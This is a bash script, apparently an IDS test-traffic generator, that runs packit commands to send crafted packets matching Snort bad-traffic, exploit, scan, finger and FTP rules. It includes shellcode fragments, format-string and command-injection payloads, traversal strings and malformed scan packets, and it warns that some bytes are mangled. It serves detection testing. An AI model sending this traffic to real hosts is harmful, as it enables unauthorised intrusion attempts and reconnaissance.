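#!/usr/bin/env bash
# Packit invocations that appear to have been generated from Snort rule sets
# (bad-traffic, exploit, scan, finger, ftp, telnet, rpc). Each active line
# sends one crafted packet whose header fields/payload are meant to trigger
# the Snort rule named in its trailing comment (rule message, references, sid).
# Lines that begin with "#packit" are disabled because a rule option
# (dsize, pcre, byte_jump, flow, ...) has no packit equivalent; the reason is
# given after "#Cannot convert:". Keep that convention when adding lines.
#
# SECURITY NOTE: this is an IDS test-traffic generator, not a scanner. Many
# payloads are real exploit fragments (shellcode, format strings, traversal
# strings) and several packets are deliberately malformed (port 0, loopback
# source/destination, SYN to multicast, bogus flag combinations). Run it only
# from a lab segment against hosts you own and are authorised to test. The
# source/destination variables below default to 0/0 and must be exported
# before running; the guard refuses the 0/0 defaults unless ALLOW_ANY_NET=1.
#
# Encoding caveat: several payloads contain raw non-ASCII bytes (rendered
# here as 8-bit mojibake). This file must be kept in its original single-byte
# encoding, otherwise the bytes packit sends will not match the rule content.
# Empty -p "" arguments next to such payloads look like NUL bytes that were
# stripped during conversion -- verify those lines against the rule before
# relying on them (NOTE(review): especially the RPC portmap lines).
set -u

# Snort-style network/port variables. HOME_NET / EXTERNAL_NET are taken from
# the environment when set; everything else is derived from HOME_NET exactly
# as in the original layout.
HOME_NET=${HOME_NET:-0/0}
EXTERNAL_NET=${EXTERNAL_NET:-0/0}
DNS_SERVERS=$HOME_NET
SMTP_SERVERS=$HOME_NET
HTTP_SERVERS=$HOME_NET
SQL_SERVERS=$HOME_NET
TELNET_SERVERS=$HOME_NET
SNMP_SERVERS=$HOME_NET
HTTP_PORTS=80
SHELLCODE_PORTS='! 80'
ORACLE_PORTS=1521
AIM_SERVERS='[64.12.24.0/24,64.12.25.0/24,64.12.26.14/24,64.12.28.0/24,64.12.29.0/24,64.12.161.0/24,64.12.163.0/24,205.188.5.0/24,205.188.9.0/24]'

# Refuse the all-zero defaults unless the operator explicitly opts in: every
# line below emits crafted exploit/scan traffic and 0/0 puts no restriction
# on where it goes.
if [[ "$HOME_NET" == "0/0" || "$EXTERNAL_NET" == "0/0" ]] && [[ "${ALLOW_ANY_NET:-0}" != "1" ]]; then
  printf 'refusing to run with HOME_NET=%s EXTERNAL_NET=%s; export your lab ranges first (or ALLOW_ANY_NET=1 to override)\n' \
    "$HOME_NET" "$EXTERNAL_NET" >&2
  exit 2
fi

# ---- bad-traffic.rules ------------------------------------------------------
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 0 # "BAD-TRAFFIC tcp port 0 traffic" classtype:misc-activity sid:524
packit -t TCP -d "$EXTERNAL_NET" -s "$HOME_NET" --S 0 # "BAD-TRAFFIC tcp port 0 traffic" classtype:misc-activity sid:524
packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 0 # "BAD-TRAFFIC udp port 0 traffic" cve,CVE-1999-0675 nessus,10074 classtype:misc-activity sid:525
packit -t UDP -d "$EXTERNAL_NET" -s "$HOME_NET" --S 0 # "BAD-TRAFFIC udp port 0 traffic" cve,CVE-1999-0675 nessus,10074 classtype:misc-activity sid:525
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" -F SYN #Cannot convert: dsize:>6 "BAD-TRAFFIC data in TCP SYN packet" url,www.cert.org/incident_notes/IN-99-07.html sid:526 classtype:misc-activity
packit -d 127.0.0.0/8 # "BAD-TRAFFIC loopback traffic" classtype:bad-unknown url,rr.sans.org/firewall/egress.php sid:528
packit -s 127.0.0.0/8 # "BAD-TRAFFIC loopback traffic" classtype:bad-unknown url,rr.sans.org/firewall/egress.php sid:528
# NOTE(review): no IP-flag option was carried over for the next two rules, so
# as written they send plain packets and are unlikely to trigger the rule.
packit -s "$EXTERNAL_NET" -d "$HOME_NET" # "BAD-TRAFFIC ip reserved bit set" sid:523 classtype:misc-activity
#packit -s "$EXTERNAL_NET" -d "$HOME_NET" -T 0 #Cannot convert: EN-US q138268 "BAD-TRAFFIC 0 ttl" url,www.isi.edu/in-notes/rfc1122.txt url,support.microsoft.com/default.aspx?scid=kb sid:1321 classtype:misc-activity
packit -s "$EXTERNAL_NET" -d "$HOME_NET" # "BAD-TRAFFIC bad frag bits" sid:1322 classtype:misc-activity
# Disabled in review: "-t ip_proto:>134" is an unconverted Snort option, not a
# packit type, and the unquoted ">" was a shell redirection that created a
# file named "134" in the working directory.
#packit -s "$EXTERNAL_NET" -d "$HOME_NET" #Cannot convert: ip_proto:>134 "BAD-TRAFFIC Unassigned/Reserved IP protocol" url,www.iana.org/assignments/protocol-numbers classtype:non-standard-protocol sid:1627
packit -t TCP -d 232.0.0.0/8 -F SYN # "BAD-TRAFFIC syn to multicast address" classtype:bad-unknown sid:1431
packit -t TCP -d 233.0.0.0/8 -F SYN # "BAD-TRAFFIC syn to multicast address" classtype:bad-unknown sid:1431
packit -t TCP -d 239.0.0.0/8 -F SYN # "BAD-TRAFFIC syn to multicast address" classtype:bad-unknown sid:1431

# ---- exploit.rules ----------------------------------------------------------
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 22 -p "/bin/sh" # "EXPLOIT ssh CRC32 overflow /bin/sh" bugtraq,2347 cve,CVE-2001-0144 classtype:shellcode-detect sid:1324
# NOTE(review): empty payload -- the rule content appears to have been lost in
# conversion; this line is unlikely to trigger sid:1326 as written.
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 22 -p "" # "EXPLOIT ssh CRC32 overflow NOOP" bugtraq,2347 cve,CVE-2001-0144 classtype:shellcode-detect sid:1326
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 22 -p "W" -p "˙˙˙˙" # "EXPLOIT ssh CRC32 overflow" bugtraq,2347 cve,CVE-2001-0144 classtype:shellcode-detect sid:1327
packit -t TCP -s "$EXTERNAL_NET" --S 80 -d "$HOME_NET" -p "3Éą?éQ<úG3ŔP÷ĐP" # "EXPLOIT Netscape 4.7 client overflow" cve,CVE-2000-1187 bugtraq,822 arachnids,215 classtype:attempted-user sid:283
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 2766 -p "ë#^3ŔˆFú‰Fő‰6" # "EXPLOIT nlps x86 Solaris overflow" classtype:attempted-admin sid:300 bugtraq,2319
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 515 -p "C‰[K‰C ° ̀1ŔţŔ̀č”˙˙˙/bin/sh" # "EXPLOIT LPRng overflow" cve,CVE-2000-0917 bugtraq,1712 classtype:attempted-admin sid:301
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 515 -p "XXXX%.172u%300\$n" # "EXPLOIT Redhat 7.0 lprd overflow" classtype:attempted-admin sid:302
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 6373 -p "ë]UţM˜ţM›" # "EXPLOIT SCO calserver overflow" cve,CVE-2000-0306 bugtraq,2353 classtype:attempted-admin sid:304
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 8080 -p "whois://" #Cannot convert: dsize: >1000 "EXPLOIT delegate proxy overflow" nocase-ignored arachnids,267 classtype:attempted-admin sid:305 bugtraq,808 cve,CVE-2000-0165
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 9090 -p "GET / HTTP/1.1" # "EXPLOIT VQServer admin" nocase-ignored bugtraq,1610 url,www.vqsoft.com/vq/server/docs/other/control.html cve,CAN-2000-0766 classtype:attempted-admin sid:306
packit -t TCP -s "$EXTERNAL_NET" --S 21 -d "$HOME_NET" -p "´ ´‹Ěƒé‹3Éfš" # "EXPLOIT NextFTP client overflow" bugtraq,572 cve,CVE-1999-0671 classtype:attempted-user sid:308
#packit -t TCP -s "$EXTERNAL_NET" -d "$SMTP_SERVERS" --D 25 -F ACK -p "from:" #Cannot convert: dsize: >512 "EXPLOIT sniffit overflow" nocase-ignored bugtraq,1158 cve,CAN-2000-0343 arachnids,273 classtype:attempted-admin sid:309
packit -t TCP -s "$EXTERNAL_NET" -d "$SMTP_SERVERS" --D 25 -p "ëEë [ü3Éą‚‹ó€+" # "EXPLOIT x86 windows MailMax overflow" bugtraq,2312 cve,CVE-1999-0404 classtype:attempted-admin sid:310
packit -t TCP -s "$HOME_NET" -d "$EXTERNAL_NET" --D 80 -p "3Éą?éQ<úG3ŔP÷ĐP" # "EXPLOIT Netscape 4.7 unsucessful overflow" cve,CVE-2000-1187 bugtraq,822 arachnids,214 classtype:unsuccessful-user sid:311
#packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 123 #Cannot convert: dsize: >128 "EXPLOIT ntpdx overflow attempt" arachnids,492 bugtraq,2540 classtype:attempted-admin sid:312
packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 518 -p "č" # "EXPLOIT ntalkd x86 Linux overflow" bugtraq,210 classtype:attempted-admin sid:313
packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 635 -p "^°‰ţȉF°‰F" # "EXPLOIT x86 Linux mountd overflow" cve,CVE-1999-0002 bugtraq,121 classtype:attempted-admin sid:315
packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 635 -p "ëV^VVV1҈V ˆV" # "EXPLOIT x86 Linux mountd overflow" cve,CVE-1999-0002 bugtraq,121 classtype:attempted-admin sid:316
packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 635 -p "ë@^1Ŕ@‰F‰Ă@‰" # "EXPLOIT x86 Linux mountd overflow" cve,CVE-1999-0002 bugtraq,121 classtype:attempted-admin sid:317
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 2224 -p "1Ű̀č[˙˙˙" # "EXPLOIT MDBMS overflow" bugtraq,1252 cve,CVE-2000-0446 classtype:attempted-admin sid:1240
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 4242 -p "˙űx˙űx˙űx˙űx" -p "@Š˙Č@‚˙Ř;6ţ;vţ" #Cannot convert: dsize:>1000 "EXPLOIT AIX pdnsd overflow" cve,CVE-1999-0745 bugtraq,3237 classtype:attempted-user sid:1261
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 4321 -p "-soa %p" # "EXPLOIT rwhoisd format string attempt" cve,CAN-2001-0838 bugtraq,3474 classtype:misc-attack sid:1323
# Disabled in review: the rule's negated content !"000" was passed through as
# a literal payload "!000", which inverts the rule's meaning.
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 6112 -p "1" #Cannot convert: negated content !"000" "EXPLOIT CDE dtspcd exploit attempt" cve,CAN-2001-0803 url,www.cert.org/advisories/CA-2002-01.html classtype:misc-attack sid:1398
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 32772:34000 -p "‡†" #Cannot convert: dsize:>720 "EXPLOIT cachefsd buffer overflow attempt" classtype:misc-attack cve,CAN-2002-0084 bugtraq,4631 sid:1751
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 749 -p "ŔŔŔŔ" # "EXPLOIT kadmind buffer overflow attempt" cve,CAN-2002-1235 url,www.kb.cert.org/vuls/id/875073 classtype:shellcode-detect sid:1894
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 751 -p "ŔŔŔŔ" # "EXPLOIT kadmind buffer overflow attempt" cve,CAN-2002-1235 url,www.kb.cert.org/vuls/id/875073 classtype:shellcode-detect sid:1895
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 749 -p "˙˙KADM0.0Aű" # "EXPLOIT kadmind buffer overflow attempt" cve,CAN-2002-1235 url,www.kb.cert.org/vuls/id/875073 classtype:shellcode-detect sid:1896
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 751 -p "˙˙KADM0.0Aű" # "EXPLOIT kadmind buffer overflow attempt" cve,CAN-2002-1235 url,www.kb.cert.org/vuls/id/875073 classtype:shellcode-detect sid:1897
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 749 -p "/shh//bi" # "EXPLOIT kadmind buffer overflow attempt" cve,CAN-2002-1235 url,www.kb.cert.org/vuls/id/875073 classtype:shellcode-detect sid:1898
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 751 -p "/shh//bi" # "EXPLOIT kadmind buffer overflow attempt" cve,CAN-2002-1235 url,www.kb.cert.org/vuls/id/875073 classtype:shellcode-detect sid:1899
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 22 -p "GOBBLES" # "EXPLOIT gobbles SSH exploit attempt" bugtraq,5093 classtype:misc-attack sid:1812
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 515 -p "psfile=\"\`" # "EXPLOIT LPD dvips remote command execution attempt" cve,CVE-2001-1002 nessus,11023 classtype:system-call-detect sid:1821
#packit -t TCP -s "$EXTERNAL_NET" --S 22 -d "$HOME_NET" -p "SSH-" #Cannot convert: isdataat:200,relative pcre:"/^SSH-s[^n]{200}/ism" "EXPLOIT SSH server banner overflow" nocase-ignored bugtraq,5287 classtype:misc-attack sid:1838
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 6666:7000 -p "ëK[S2äƒĂ Kˆ#¸Pw" # "EXPLOIT CHAT IRC topic overflow" cve,CVE-1999-0672 bugtraq,573 classtype:attempted-user sid:307
#packit -t TCP --D 6666:7000 -p "PRIVMSG" -p "nickserv" -p "IDENTIFY" #Cannot convert: isdataat:100,relative pcre:"/^PRIVMSGs+nickservs+IDENTIFYs[^n]{100}/smi" "EXPLOIT CHAT IRC Ettercap parse overflow attempt" nocase-ignored nocase-ignored nocase-ignored url,www.bugtraq.org/dev/GOBBLES-12.txt classtype:misc-attack sid:1382
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 139 -p "ë/_ëJ^‰ű‰>‰ň" # "EXPLOIT x86 Linux samba overflow" bugtraq,1816 cve,CVE-1999-0811 cve,CVE-1999-0182 classtype:attempted-admin sid:292

# ---- scan.rules -------------------------------------------------------------
packit -t TCP -s "$EXTERNAL_NET" --S 10101 -d "$HOME_NET" -T 255 -a 0 -F SYN # "SCAN myscan" arachnids,439 classtype:attempted-recon sid:613
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 113 -p "VERSION" # "SCAN ident version request" arachnids,303 classtype:attempted-recon sid:616
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 80 -F FINSYN #Cannot convert: dsize: 0 "SCAN cybercop os probe" arachnids,146 classtype:attempted-recon sid:619
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 3128 -F SYN # "SCAN Squid Proxy attempt" classtype:attempted-recon sid:618
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 1080 -F SYN # "SCAN SOCKS Proxy attempt" url,help.undernet.org/proxyscan/ classtype:attempted-recon sid:615
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 8080 -F SYN # "SCAN Proxy Port 8080 attempt" classtype:attempted-recon sid:620
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" -F FIN # "SCAN FIN" arachnids,27 classtype:attempted-recon sid:621
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" -F SYN -q 1958810375 # "SCAN ipEye SYN scan" arachnids,236 classtype:attempted-recon sid:622
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" -q 0 -a 0 # "SCAN NULL" arachnids,4 classtype:attempted-recon sid:623
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" -F FINSYN # "SCAN SYN FIN" arachnids,198 classtype:attempted-recon sid:624
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" -F ACKFINPSHSYNRSTURG # "SCAN XMAS" arachnids,144 classtype:attempted-recon sid:625
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" -F FINPSHURG # "SCAN nmap XMAS" arachnids,30 classtype:attempted-recon sid:1228
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" -F ACK -a 0 # "SCAN nmap TCP" arachnids,28 classtype:attempted-recon sid:628
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" -F FINPSHSYNURG # "SCAN nmap fingerprint attempt" arachnids,05 classtype:attempted-recon sid:629
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" -n 39426 -F FINSYN # "SCAN synscan portscan" arachnids,441 classtype:attempted-recon sid:630
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" -p "AAAAAAAAAAAAAAAA" -F ACKPSH # "SCAN cybercop os PA12 attempt" arachnids,149 classtype:attempted-recon sid:626
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" -p "AAAAAAAAAAAAAAAA" -F FINSYNURG -a 0 # "SCAN cybercop os SFU12 probe" arachnids,150 classtype:attempted-recon sid:627
packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 10080:10081 -p "Amanda" # "SCAN Amanda client version request" nocase-ignored classtype:attempted-recon sid:634
packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 49 -p "€" # "SCAN XTACACS logout" arachnids,408 classtype:bad-unknown sid:635
packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 7 -p "cybercop" # "SCAN cybercop udp bomb" arachnids,363 classtype:bad-unknown sid:636
packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" -p "helpquite" # "SCAN Webtrends Scanner UDP Probe" arachnids,308 classtype:attempted-recon sid:637
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 22 -p "Version_Mapper" # "SCAN SSH Version map attempt" nocase-ignored classtype:network-scan sid:1638
packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 1900 -p "M-SEARCH " -p "ssdp:discover" # "SCAN UPnP service discover attempt" classtype:network-scan sid:1917
packit -t ICMP -s "$EXTERNAL_NET" -d "$HOME_NET" -p "SolarWinds.Net" # "SCAN SolarWinds IP scan attempt" classtype:network-scan sid:1918
packit -t TCP -s "$EXTERNAL_NET" -d "$HTTP_SERVERS" --D "$HTTP_PORTS" -p "AAAAAAAAAAAAAAAA" -F FINPSHSYN -a 0 # "SCAN cybercop os probe" arachnids,145 classtype:attempted-recon sid:1133

# ---- finger.rules -----------------------------------------------------------
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 79 -p "cmd_rootsh" # "FINGER cmd_rootsh backdoor attempt" classtype:attempted-admin nessus,10070 cve,CAN-1999-0660 url,www.sans.org/y2k/TFN_toolkit.htm url,www.sans.org/y2k/fingerd.htm sid:320
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 79 -p "a b c d e f" # "FINGER account enumeration attempt" nocase-ignored nessus,10788 classtype:attempted-recon sid:321
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 79 -p "search" # "FINGER search query" cve,CVE-1999-0259 arachnids,375 classtype:attempted-recon sid:322
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 79 -p "root" # "FINGER root query" arachnids,376 classtype:attempted-recon sid:323
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 79 -p "" # "FINGER null request" arachnids,377 classtype:attempted-recon sid:324
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 79 -p ";" #Cannot convert: Can't handle escaped semicolon correctly "FINGER remote command execution attempt" cve,CVE-1999-0150 bugtraq,974 arachnids,379 classtype:attempted-user sid:326
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 79 -p "|" # "FINGER remote command pipe execution attempt" cve,CVE-1999-0152 bugtraq,2220 arachnids,380 classtype:attempted-user sid:327
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 79 -p "@@" # "FINGER bomb attempt" arachnids,381 cve,CAN-1999-0106 classtype:attempted-dos sid:328
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 79 -p "@" # "FINGER redirection attempt" nessus,10073 arachnids,251 cve,CAN-1999-0105 classtype:attempted-recon sid:330
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 79 -p " " # "FINGER cybercop query" arachnids,132 cve,CVE-1999-0612 classtype:attempted-recon sid:331
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 79 -p "0" # "FINGER 0 query" nessus,10069 arachnids,378 arachnids,131 cve,CAN-1999-0197 classtype:attempted-recon sid:332
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 79 -p "." # "FINGER . query" nessus,10072 arachnids,130 cve,CAN-1999-0198 classtype:attempted-recon sid:333
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 79 -p "version" # "FINGER version query" classtype:attempted-recon sid:1541

# ---- ftp.rules --------------------------------------------------------------
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "CEL" #Cannot convert: isdataat:100,relative pcre:"/^CELs[^n]{100}/smi" "FTP CEL overflow attempt" nocase-ignored bugtraq,679 cve,CVE-1999-0789 arachnids,257 classtype:attempted-admin sid:337
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "CWD" #Cannot convert: isdataat:100,relative pcre:"/^CWDs[^n]{100}/smi" "FTP CWD overflow attempt" nocase-ignored cve,CAN-2000-1035 cve,CAN-2000-1194 cve,CAN-2002-0126 classtype:attempted-admin sid:1919
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "CMD" #Cannot convert: isdataat:100,relative pcre:"/^CMDs[^n]{100}/smi" "FTP CMD overflow attempt" nocase-ignored classtype:attempted-admin sid:1621
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "STAT" #Cannot convert: isdataat:100,relative pcre:"/^STATs[^n]{100}/smi" "FTP STAT overflow attempt" nocase-ignored url,labs.defcom.com/adv/2001/def-2001-31.txt classtype:attempted-admin sid:1379
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "SITE" -p "CHOWN" #Cannot convert: isdataat:100,relative pcre:"/^SITEs+CHOWNs[^n]{100}/smi" "FTP SITE CHOWN overflow attempt" nocase-ignored nocase-ignored cve,CAN-2001-0065 classtype:attempted-admin sid:1562
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "SITE" -p "NEWER" #Cannot convert: isdataat:100,relative pcre:"/^SITEs+NEWERs[^n]{100}/smi" "FTP SITE NEWER overflow attempt" nocase-ignored nocase-ignored cve,CVE-1999-0800 classtype:attempted-admin sid:1920
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "SITE" -p "CPWD" #Cannot convert: isdataat:100,relative pcre:"/^SITEs+CPWDs[^n]{100}/smi" "FTP SITE CPWD overflow attempt" nocase-ignored nocase-ignored bugtraq,5427 cve,CAN-2002-0826 classtype:misc-attack sid:1888
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "SITE" -p "EXEC" -p "%" -p "%" # "FTP SITE EXEC format string attempt" nocase-ignored nocase-ignored classtype:bad-unknown sid:1971
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "SITE" #Cannot convert: isdataat:100,relative pcre:"/^SITEs[^n]{100}/smi" "FTP SITE overflow attempt" nocase-ignored cve,CAN-2001-0755 cve,CAN-2001-0770 cve,CVE-1999-0838 classtype:attempted-admin sid:1529
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "USER" #Cannot convert: Unrecognized flow type to_server,established,no_stream isdataat:100,relative pcre:"/^USERs[^n]{100}/smi" "FTP USER overflow attempt" nocase-ignored bugtraq,4638 cve,CAN-2000-0479 cve,CAN-2000-0656 cve,CAN-2000-1035 cve,CAN-2000-1194 cve,CAN-2001-0794 cve,CAN-2001-0826 cve,CAN-2002-0126 cve,CVE-2000-0943 classtype:attempted-admin sid:1734
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "PASS" #Cannot convert: Unrecognized flow type to_server,established,no_stream isdataat:100,relative pcre:"/^PASSs[^n]{100}/smi" "FTP PASS overflow attempt" nocase-ignored cve,CAN-2000-1035 cve,CAN-2002-0126 classtype:attempted-admin sid:1972
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "RMDIR" #Cannot convert: isdataat:100,relative pcre:"/^RMDIRs[^n]{100}/smi" "FTP RMDIR overflow attempt" nocase-ignored classtype:attempted-admin sid:1942
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "MKD" #Cannot convert: isdataat:100,relative pcre:"/^MKDs[^n]{100}/smi" "FTP MKD overflow attempt" nocase-ignored cve,CAN-1999-0911 bugtraq,612 classtype:attempted-admin sid:1973
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "REST" #Cannot convert: isdataat:100,relative pcre:"/^RESTs[^n]{100}/smi" "FTP REST overflow attempt" nocase-ignored cve,CAN-2001-0826 classtype:attempted-admin sid:1974
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "DELE" #Cannot convert: isdataat:100,relative pcre:"/^DELEs[^n]{100}/smi" "FTP DELE overflow attempt" nocase-ignored cve,CAN-2001-0826 classtype:attempted-admin sid:1975
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "RMD" #Cannot convert: isdataat:100,relative pcre:"/^RMDs[^n]{100}/smi" "FTP RMD overflow attempt" nocase-ignored cve,CAN-2001-0826 classtype:attempted-admin sid:1976
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "MODE" #Cannot convert: pcre:"/^MODEs+[^ABSC]{1}/msi" "FTP invalid MODE" nocase-ignored classtype:protocol-command-decode sid:1623
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "PWD" #Cannot convert: dsize:10 "FTP large PWD command" nocase-ignored classtype:protocol-command-decode sid:1624
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "SYST" #Cannot convert: dsize:10 "FTP large SYST command" nocase-ignored classtype:protocol-command-decode sid:1625
# Payload is the literal three bytes C:\ -- single quotes keep the backslash
# from escaping the closing quote (the double-quoted form swallowed the rest
# of the line into the argument list).
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "CWD" -p 'C:\' # "FTP CWD Root directory transversal attempt" nocase-ignored nessus,11677 bugtraq,7674 classtype:protocol-command-decode sid:2125
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "SITE" -p "ZIPCHK" #Cannot convert: isdataat:100,relative pcre:"/^SITEs+ZIPCHKs[^n]{100}/smi" "FTP SITE ZIPCHK overflow attempt" nocase-ignored nocase-ignored cve,CVE-2000-0040 classtype:attempted-admin sid:1921
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "SITE" -p "NEWER" #Cannot convert: pcre:"/^SITEs+NEWER/smi" "FTP SITE NEWER attempt" nocase-ignored nocase-ignored cve,CVE-1999-0880 nessus,10319 classtype:attempted-dos sid:1864
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "SITE" -p "EXEC" #Cannot convert: pcre:"/^SITEs+EXEC/smi" "FTP SITE EXEC attempt" nocase-ignored nocase-ignored bugtraq,2241 arachnids,317 classtype:bad-unknown sid:361
# Rule message restored to "STAT * dos attempt": the unquoted "*" had been
# glob-expanded into a directory listing when this line was generated.
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "STAT" -p "*" # "FTP EXPLOIT STAT * dos attempt" nocase-ignored bugtraq,4482 classtype:attempted-dos sid:1777
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "STAT" -p "?" # "FTP EXPLOIT STAT ? dos attempt" nocase-ignored bugtraq,4482 classtype:attempted-dos sid:1778
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p " --use-compress-program" # "FTP tar parameters" nocase-ignored bugtraq,2240 arachnids,134 cve,CVE-1999-0202 classtype:bad-unknown sid:362
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "CWD" -p "~root" #Cannot convert: pcre:"/^CWDs+~root/smi" "FTP CWD ~root attempt" nocase-ignored nocase-ignored cve,CVE-1999-0082 arachnids,318 classtype:bad-unknown sid:336
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "CWD" -p "..." # "FTP CWD ..." nocase-ignored classtype:bad-unknown sid:1229
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "CWD" #Cannot convert: pcre:"/^CWDs+~/smi" "FTP CWD ~ attempt" cve,CAN-2001-0421 bugtraq,2601 classtype:denial-of-service sid:1672
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p ".%20." # "FTP serv-u directory transversal" nocase-ignored bugtraq,2052 cve,CVE-2001-0054 classtype:bad-unknown sid:360
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "~" -p "[" # "FTP wu-ftp bad file completion attempt [" cve,CVE-2001-0550 cve,CAN-2001-0886 bugtraq,3581 classtype:misc-attack sid:1377
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "~" -p "{" # "FTP wu-ftp bad file completion attempt {" cve,CVE-2001-0550 cve,CAN-2001-0886 bugtraq,3581 classtype:misc-attack sid:1378
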